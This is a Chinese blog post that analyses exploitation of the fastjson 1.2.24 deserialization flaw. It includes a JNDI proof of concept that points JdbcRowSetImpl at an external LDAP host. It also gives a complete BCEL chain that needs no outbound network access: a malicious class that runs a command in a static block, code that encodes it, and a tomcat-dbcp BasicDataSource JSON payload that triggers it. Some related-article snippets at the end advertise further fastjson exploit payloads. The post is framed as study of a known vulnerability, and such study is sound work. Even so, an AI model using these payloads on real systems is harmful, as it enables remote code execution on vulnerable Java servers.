fastjson-BCEL不出网打法原理分析

最新推荐文章于 2024-04-28 09:39:35 发布
最新推荐文章于 2024-04-28 09:39:35 发布
阅读量2.7k 收藏 7
点赞数 3
分类专栏: Java安全 文章标签: json 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49248030/article/details/127989449
版权

FastJson反序列化漏洞

与原生的 Java 反序列化的区别在于,FastJson 反序列化并未使用 readObject 方法,而是由 FastJson 自定一套反序列化的过程。通过在反序列化的过程中自动调用类属性的 setter 方法和 getter 方法,将 JSON 字符串还原成对象,当这些自动调用的方法中存在可利用的潜在危险代码时,漏洞便产生了。

fastjson用法:

1.将字符串转换为json格式,通过key获取value:

class jsonUser{
    public static void main(String[] args) {
        //正常使用将字符串转换成json格式,提取相关数据
        String s = "{\"name\":\"小红\",\"age\":\"18\"}";
        JSONObject jsonobject = (JSONObject) JSON.parse(s);
        System.out.println(jsonobject.get("name"));
    }}

小红

这么简单好用的一个功能为什么会出现漏洞?

2.将JSON还原成对象:

class User {
    private String id;

    User() {
        System.out.println("User go");
    }

    public void setId(String ids) {
        System.out.println("setId go");
        this.id = ids;
    }

    public String getId() {
        System.out.println("GetId go");
        return this.id;
    }
}

public class Fastjson {

            public static void main(String[] args) {
            User a = new User();
            String json = JSON.toJSONString(a);  //序列化 转为json
//            System.out.println(json);
            System.out.println(JSON.parseObject(json,User.class));  //反序列化 转为原始数据
        }
}

result:会自动调用 Get方法和构造方法。

在这里插入图片描述

fastjson漏洞产生原因:

public class Fastjson {
public static void main(String[] args) {
JSONObject jsonObject = JSON.parseObject({\"@type\":\"Java_deserialization.User\",\"id\":\"123\"}");
System.out.println(jsonObject);
            }
        }

result:会自动调用Get,Set,构造方法。

在这里插入图片描述

这里fastjson提供了AutoType这种方式来指定需要还原的对象以及值{“@type”:“Java_deserialization.User”,“id”:“123”},其中@type后面跟进的就是我们所需要还原的对象(可控)后面跟进的id也就是这个类里面的属性,如果有一个fastjson反序列化点可控那么我们就可以随意指定一个恶意类,如果这个恶意类里面的构造方法或者Get,Set方法调用了恶意的方法那么就会造成反序列化漏洞。

fastjson什么时候会调用get方法?

细节就不调试了,感兴趣可以调试JavaBeanInfo.build() 里面的规则

● 只存在 getter 方法,无 setter 方法。

● 方法名称长度大于等于 4。

● 非静态方法。

● 方法名以 get 开头,且第四个字符为大写字母,例如 getAge。

● 方法无须入参。

● 方法返回值继承自 Collection、Map、AtomicBoolean、AtomicInteger 和

AtomicLong 的其中一个。

fastjson1.2.24-JndI注入

Poc:

public class Fastjson {

          public static void main(String[] args) {
          System.out.println(JSON.parseObject("{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
                  "\"dataSourceName\":\"ldap://erh3yu.dnslog.cn\"," + "\"autoCommit\":\"true\"}"));
            }
        }

在这里插入图片描述

根据之前的分析,可以知道攻击者指定了一个类 @type:com.sun.rowset.JdbcRowSetImpl,然后给类里面的属性进行了赋值(就跟之前的id一样的),那么赋值以后就会调用对应的set方法,也许危险代码就在set方法里面:

1.调用set方法dataSourceName:

在这里插入图片描述

2.调用setAutoCommit方法:为什么是true?这里autoCommit是一个布尔值,你传false 或者0,1都可以。
在这里插入图片描述

会进入caonnect方法,危险方法就是这个connect:

3.connect方法:

在这里插入图片描述

熟悉Java的朋友就会知道这是一个Jndi注入点,其中里面的dataSourceName是可控的就是我们刚刚传入的ldap协议,这里就不过多的阐述ldap协议了,后面会单独的去做笔记。ldap协议属于jndi里面的一种可以远程动态加载其他服务器上面的资源,如果远程加载的对象可控那么我们就可以远程加载自己构建的恶意类。

4.这里我们跟进lookup看看:

在这里插入图片描述

5.getURLOrDefaultInitCtx方法:

在这里插入图片描述

这里会对我们传入的uri进行判断,判断是什么协议比如ldap,rmi等远程加载数据的协议。

fastjson1.2.24-BCEL不出网打法

刚刚介绍的是fastjson利用jndi注入来远程加载恶意类的方法,如果机器在内网无法访问互联网那么这种方法就失败了,虽然TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见所以我们就介绍另外一种攻击方法apache-BCEL,直接传入字节码不需要出网就可执行恶意代码但是需要引入tomcat的依赖,但在实际攻击中还算是比较常见的。

复现环境

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>

<dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-dbcp</artifactId>
            <version>9.0.20</version>
        </dependency>
// tomcat-bdcp在7还是8版本一下名称叫做dbcp,大家引入的时候注意一下

POC:

{
        "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
        "driverClassLoader": {
            "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        "driverClassName": "$$BCEL$$$l$8b......"
}

这里需要说明一下driverClassName里面传入的其实是恶意类经过BCEL协议编码过后的代码,网上很多的人都没有说明,也没有告诉大家如何生成,后面部分会为一步一步说。

分析:

正常使用BCEL:

import com.sun.org.apache.bcel.internal.classfile.Utility;
import org.springframework.util.FileCopyUtils;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;

public class fastjsonBcel {
    public static void main(String[] args) throws Exception {
        //不考虑fastjson情况就正常调用该类
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));
        String code = Utility.encode(bytes,true);
        classLoader.loadClass("$$BCEL$$"+code).newInstance();
        
        //将文件转为字节码数组
    public static byte[] fileToBinArray(File file){
        try {
            InputStream fis = new FileInputStream(file);
            byte[] bytes = FileCopyUtils.copyToByteArray(fis);
            return bytes;
        }catch (Exception ex){
            throw new RuntimeException("transform file into bin Array 出错",ex);
        }
    }

}
    
    //恶意类
    
    package Java_deserialization;

import java.lang.Runtime;
import java.lang.Process;

public class Evil {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"calc"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

//javac Evil.java 转为.class,动态调用的是字节码

com.sun.org.apache.bcel.internal.util里面有一个classLoader类,ClassLoader类里面有一个loadClass方法,如果满足方法里面的条件就可以动态调用恶意代码,其中恶意代码是通过BCEL格式传入的。

在这里插入图片描述

代码很简单,创建一个对象然后调用loadClass方法,需要注意的是为什么我们需要做编码这一步:

String code = Utility.encode(bytes,true);

我们在调用loadClass方法的时候会调用 creatClass方法,这里需要跟进去看看

在这里插入图片描述
在这里插入图片描述

可以看到在进入到 creatClass方法以后会对数据进行解码,所以在之前我们需要进行编码而且为了满足条件需要加上"$ $ BCEL$ $"相关的字符串才能绕过if判断。

在这里插入图片描述

成功执行命令,那么现在我们需要考虑的就是如何将这个恶意方法和fastjson结合起来。

tomcat-dbcp:

结合tomcat-dbcp这个类进行组合达到触发fastjson的目的:

tomcat-dbcp里面有一个BasicDataSource类,在反序列化的时候会调用getConnection()方法:

在这里插入图片描述

getConnection()方法在返回的时候会调用createDataSource()方法:

在这里插入图片描述

createDataSource()方法又会调用createConnectionFactory()方法,

在这里插入图片描述

问题代码:

driverFromCCL = Class.forName(driverClassName, true, driverClassLoader);

正常BCEL的代码:

ClassLoader classLoader = new ClassLoader();
classLoader.loadClass("$$BCEL$$"+code).newInstance();

通过动态类加载调用我们的loadclass,如果Class.forName(driverClassName, true, driverClassLoader)中的driverClassName和driverClassLoader可控,那么我们就可以传入我们正常BCEL生成的 classLoader和BCEL绕过的代码,恰巧这里有对应的set方法,那么在fastjson反序列化中就会调用set方法来达到可控的目的:

在这里插入图片描述

在这里插入图片描述

public class fastjsonBcel {
    public static void main(String[] args) throws Exception {
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));
        String code = Utility.encode(bytes,true);
        BasicDataSource basicDataSource = new BasicDataSource();
        basicDataSource.setDriverClassLoader(classLoader);
        basicDataSource.setDriverClassName("$$BCEL$$"+code);
        basicDataSource.getConnection();

    }

攻击链:

在这里插入图片描述

换成正常POC测试:

public class fastjsonBcel {
    public static void main(String[] args) throws Exception {
        byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));
        String code = Utility.encode(bytes,true);
        String s = "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassName\":\"$$BCEL$$" + code + "\",\"driverClassloader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}";
        JSON.parseObject(s);
    }

在这里插入图片描述

Q00000001
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
Fastjson不出利用
Shanfenglan's blog
02-19 5310
文章目录1. org.apache.tomcat.dbcp.dbcp2.BasicDataSource2.com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl3. 双亲委派3.1 实现3.2 主动破坏双亲委派机制的方法3.3 为什么要破坏双亲委派3.4 为什么Tomcat要破坏双亲委派4. 参考文章 1. org.apache.tomcat.dbcp.dbcp2.BasicDataSource 条件:BasicDataSource只需要有dbc
Java反序列化漏洞总结【fastjson为例】
z69183787的专栏
01-06 1408
前言 前段时间FastJson被曝高危漏洞,其实之前也被报过类似的漏洞,只是项目中没有使用,所以一直也没怎么关注;这一次刚好有项目用到FastJson,打算对其做一个分析。 漏洞背景 2020年05月28日, 360CERT监测发现业内安全厂商发布了[Fastjson远程代码执行漏洞](https://cert.360.cn/warning/detail?id=af8fea5f165df6198033de208983e2ad)的风险通告,漏洞等级:高危。Fastjson是阿里巴巴的开源JSON解析库,
fastjson不出利用方案
m0_62207482的博客
03-03 636
Tomcat 8.0以后使用org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat 8.0以下使用 org.apache.tomcat.dbcp.dbcp.BasicDataSource。# 目 前 公 开 已 知 的 poc 有 两 个 : com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl。
fastjon不出利用
c0rdXy的博客
09-24 296
fastjon不出利用
fastjson-c3p0:fastjson不出回显利用
03-19
fastjson-c3p0 fastjson不出回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
fastjson BCEL不出打法
遇事不决冲冲冲
04-30 6128
BasicDataSource 如果目标服务器没有外、无法反连,自然就用不了JdbcRowSetImpl利用链这种JNDI注入的利用方式,而TemplatesImpl利用链虽然原理上也是利用了 ClassLoader 动态加载恶意代码,但是需要开启Feature.SupportNonPublicField,并且实际应用中其实不多见,这里就引出BasicDataSource,我们可以直接在Payload中直接传入字节码并且不需要出,不需要开启特殊的参数,适用范围较广,目标需要引入tomcat依赖,虽说也是
浅析FastJson不出利用
ki10Moc的博客
11-14 1846
浅析FastJson不出利用
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送jar包:fastjson-1.2.54.jar; 赠送原API文档:fastjson-1.2.54-javadoc.jar; 赠送源代码:fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-...
fastjson-1.2.72-API文档-中文版.zip
06-06
赠送jar包:fastjson-1.2.72.jar; 赠送原API文档:fastjson-1.2.72-javadoc.jar; 赠送源代码:fastjson-1.2.72-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.72.pom; 包含翻译后的API文档:fastjson-1.2....
fastjson-1.2.70.jar.zip
03-21
FastJsonjar包
Mac运行npm run serve报错opensslErrorStack
qq_33415990的博客
04-26 388
mac电脑运行npm run serve报错 报错opensslErrorStack
Json(标题)
最新发布
m0_74107946的博客
04-28 270
将结构体转变为Json的过程叫编组,编组是通过json.Marshal函数完成的。json的对象类型可以用于编码Go语言中的map类型和结构体。Go语言对这些标准格式和编码都有良好的支持。json可以表示字符串,数字,布尔值和对象。类似的还有XML,ASN.1。是和在编译阶段关联到该成员的。
文本文件转JSON格式
星霜笔记
04-24 217
资源¥https://kdocs.cn/l/crzS58nUMuN2。资源https://kdocs.cn/l/crzS58nUMuN2。每一行文字与链接用¥分割。
Threejs加载字体加载FontLoader与TTFLoader
qq_33298964的博客
04-25 349
在 Three.js 中使用自定义字体进行 3D 文本渲染。它最初是以 JSON 格式加载字体,现在Three.js已经有一个 TTFLoader 类,可用于加载 TTF 字体文件并将它们用作 TextGeometry!
[Flutter3] Json转dart模型举例
iOSTianNan的博客
04-23 461
3.贴入数据, 这里,我们去掉 最外层的 code/msg /data. 仅对data内的 list数据进行处理即。记录一下 Android studio plugin ->案例 json字符串, 一个 response的data返回数据。Android studio 安装插件即可。处理json转dart 模型。重启后, 右击选择生成数据。
fastjson不出怎么利用
07-28
回答: Fastjson漏洞的利用通常需要触发目标类的setter方法或满足特定条件的getter方法。在Fastjson的反序列化过程中,JSON.parse()方法会识别并调用目标类的setter方法,但并不会调用getConnection()方法。所以,如果要利用Fastjson漏洞,需要找到一个可以触发getConnection()方法的方式。\[3\]具体的利用方法因情况而异,可以通过构造恶意的JSON数据,使得Fastjson在反序列化时调用getConnection()方法,从而实现攻击目标。但需要注意的是,利用Fastjson漏洞需要对目标系统有深入的了解,并且需要遵守法律和道德规范。 #### 引用[.reference_title] - *1* *2* [fastjson-BCEL不出打法原理分析](https://blog.csdn.net/weixin_49248030/article/details/127989449)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [fastjson BCEL不出打法](https://blog.csdn.net/weixin_54648419/article/details/124513950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值